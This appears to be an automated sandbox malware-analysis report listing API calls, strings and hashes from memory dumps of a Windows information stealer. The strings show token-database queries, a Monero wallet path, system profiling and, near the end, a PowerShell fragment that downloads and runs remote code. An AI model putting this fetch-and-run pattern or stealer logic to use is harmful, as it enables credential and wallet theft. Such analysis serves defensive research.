                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: cde22d5432183aff22937e3224ebf6cc563efd0e9db80606143d2d12e17f1a1e
                                • Instruction ID: de55d2ae355b58e6b2fd3ca424d84b5ce2cc7b0de73918fb832eeda85f847585
                                • Opcode Fuzzy Hash: cde22d5432183aff22937e3224ebf6cc563efd0e9db80606143d2d12e17f1a1e
                                • Instruction Fuzzy Hash: B7B154769102089BCB18EBA0DD96EEE73B8EF54300F44517AF50673191EF746B4ACB62
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 8f4dea8746271e6dec0a11fab60ff8d6074e677e69c2eeb54fc87876b2b0f037
                                • Instruction ID: bdfce90d79280427a8357d8ed292d37a123c2af8bcea4a5137fdc926cfd00f09
                                • Opcode Fuzzy Hash: 8f4dea8746271e6dec0a11fab60ff8d6074e677e69c2eeb54fc87876b2b0f037
                                • Instruction Fuzzy Hash: 44F05E30D04309EFD3599FE0F50976C7B74FF04707F0441AAE61A97285D6B14B819B95
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EC4FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC4FD1
                                • InternetOpenA.WININET(00EE0DDF,00000000,00000000,00000000,00000000), ref: 00EC4FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00EC5011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00EC5041
                                • InternetCloseHandle.WININET(?), ref: 00EC50B9
                                • InternetCloseHandle.WININET(?), ref: 00EC50C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 5376bcaeec1b1ecd4bce3d7c54679d6e35da19150f5ff08bad6669383a67ce09
                                • Instruction ID: bfa57d67782ba7d549078ddd8b50a7ef4c362f671ed891c2ba8de384b8a759b4
                                • Opcode Fuzzy Hash: 5376bcaeec1b1ecd4bce3d7c54679d6e35da19150f5ff08bad6669383a67ce09
                                • Instruction Fuzzy Hash: 223107B5E0021CABDB24CF54DD85BDCB7B4EB48704F1081E9EA09B7285D7B16AC58F98
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00DADF20,00000000,?,00EE0E2C,00000000,?,00000000), ref: 00ED8130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00ED8158
                                • wsprintfA.USER32 ref: 00ED81AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2922868504-3474575989
                                • Opcode ID: fc23ab20addbf9cd8aa6d8e7f0d344aa603a851581c787b85166d1f43d642901
                                • Instruction ID: b6ee2052684381bc1372dd8d7922b62df2d91b1374f92d0bbcddbae7d056d318
                                • Opcode Fuzzy Hash: fc23ab20addbf9cd8aa6d8e7f0d344aa603a851581c787b85166d1f43d642901
                                • Instruction Fuzzy Hash: CF215EB1E44318ABDB14DFD4DD49FAEB7B8FB44B00F10421AF615BB284D7B869018BA4
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00ED8426
                                • wsprintfA.USER32 ref: 00ED8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00ED847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8499
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • RegQueryValueExA.ADVAPI32(00000000,00DADDD0,00000000,000F003F,?,00000400), ref: 00ED84EC
                                • lstrlen.KERNEL32(?), ref: 00ED8501
                                • RegQueryValueExA.ADVAPI32(00000000,00DADEC0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00EE0B34), ref: 00ED8599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: d469150a885f5758535bb1f06ebff7204071d8f728ae56ab8ae1fcd2decb7cb5
                                • Instruction ID: 1f30b8280f0454ec13698318f5912a95f4cd84a8475a2a31fdf9e71a4e31c161
                                • Opcode Fuzzy Hash: d469150a885f5758535bb1f06ebff7204071d8f728ae56ab8ae1fcd2decb7cb5
                                • Instruction Fuzzy Hash: 8421D8719102189BDB28DB54DC85FE9B3B8FF48714F00C5A9A609A6240DF71AA86CF94
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED76A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED76AB
                                • RegOpenKeyExA.ADVAPI32(80000002,00D9C240,00000000,00020119,00000000), ref: 00ED76DD
                                • RegQueryValueExA.ADVAPI32(00000000,00DADFE0,00000000,00000000,?,000000FF), ref: 00ED76FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED7708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 463a96727aade57d46f893fc228c4c546abb4c0d58907463fa9fee4c0c51fddb
                                • Instruction ID: e95e91f12d8f4b80f493a897c718a58cae7301bb071f8b5406e96513ebadd37b
                                • Opcode Fuzzy Hash: 463a96727aade57d46f893fc228c4c546abb4c0d58907463fa9fee4c0c51fddb
                                • Instruction Fuzzy Hash: 3E01A7B5E04308BBD715DBE0E849F6D77B8EF44701F008466FA55E7284E6B19A418B50
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED773B
                                • RegOpenKeyExA.ADVAPI32(80000002,00D9C240,00000000,00020119,00ED76B9), ref: 00ED775B
                                • RegQueryValueExA.ADVAPI32(00ED76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00ED777A
                                • RegCloseKey.ADVAPI32(00ED76B9), ref: 00ED7784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: ab3af2797519bf53bdce18ad1d678cc985f17d04c0ec953636f3428ada1f4a63
                                • Instruction ID: 0f6a2d75102a596dbebcff11b4c1586a78c404b8229c287fed79e271bb69bf0c
                                • Opcode Fuzzy Hash: ab3af2797519bf53bdce18ad1d678cc985f17d04c0ec953636f3428ada1f4a63
                                • Instruction Fuzzy Hash: 2601A2B5E00308BFDB14DBE0EC4AFAEB7B8EF48701F004069FA15A7284DAB05A408B50
                                APIs
                                • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00ED3AEE,?), ref: 00ED92FC
                                • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00ED9319
                                • CloseHandle.KERNEL32(000000FF), ref: 00ED9327
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID: :$:
                                • API String ID: 1378416451-4250114551
                                • Opcode ID: 77c3470e8d95865ed2d1273b42ba8f402b942f714604464f4f0f141bfa4e0e62
                                • Instruction ID: 99b3ab7073d0ad9bd7a3480797bce46b3916cf0ec6737862596f18d87c9d5eef
                                • Opcode Fuzzy Hash: 77c3470e8d95865ed2d1273b42ba8f402b942f714604464f4f0f141bfa4e0e62
                                • Instruction Fuzzy Hash: 6DF04F35E40308BBDB28DFB0EC49F9E77B9EB48710F10C264B661B72C4D6B196418B40
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                • LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                • CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: fbceede4ac0bdb590a548c82022359260f1ecd01f52aaab821974250b56f62ee
                                • Instruction ID: 1446f85f935beb32de28f18bf6ff20a7cae8799242e9a3f85809e8b564603437
                                • Opcode Fuzzy Hash: fbceede4ac0bdb590a548c82022359260f1ecd01f52aaab821974250b56f62ee
                                • Instruction Fuzzy Hash: BF312A74E00209EFDB24CF94D989FAE77B5FF48304F108158E911A7290D775AA82CFA0
                                APIs
                                • lstrcat.KERNEL32(?,00DAE0D0), ref: 00ED47DB
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4801
                                • lstrcat.KERNEL32(?,?), ref: 00ED4820
                                • lstrcat.KERNEL32(?,?), ref: 00ED4834
                                • lstrcat.KERNEL32(?,00D9B828), ref: 00ED4847
                                • lstrcat.KERNEL32(?,?), ref: 00ED485B
                                • lstrcat.KERNEL32(?,00DAD770), ref: 00ED486F
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8D90: GetFileAttributesA.KERNEL32(00000000,?,00EC1B54,?,?,00EE564C,?,?,00EE0E1F), ref: 00ED8D9F
                                  • Part of subcall function 00ED4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00ED4580
                                  • Part of subcall function 00ED4570: RtlAllocateHeap.NTDLL(00000000), ref: 00ED4587
                                  • Part of subcall function 00ED4570: wsprintfA.USER32 ref: 00ED45A6
                                  • Part of subcall function 00ED4570: FindFirstFileA.KERNEL32(?,?), ref: 00ED45BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: ff8a8fae72074a3e8666bb188684ad795a7241183cb3d977d7c81218f52d11b2
                                • Instruction ID: 3199a661e540aa8da9a41e30de25da32e67157bb77bd990dbbbbe35ce61993b4
                                • Opcode Fuzzy Hash: ff8a8fae72074a3e8666bb188684ad795a7241183cb3d977d7c81218f52d11b2
                                • Instruction Fuzzy Hash: 3E3182B690031857CB25F7A0DC85EED73BCBB58300F40559AB359A6181EEB0D7CACB91
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED2D85
                                Strings
                                • ')", xrefs: 00ED2CB3
                                • <, xrefs: 00ED2D39
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00ED2D04
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00ED2CC4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
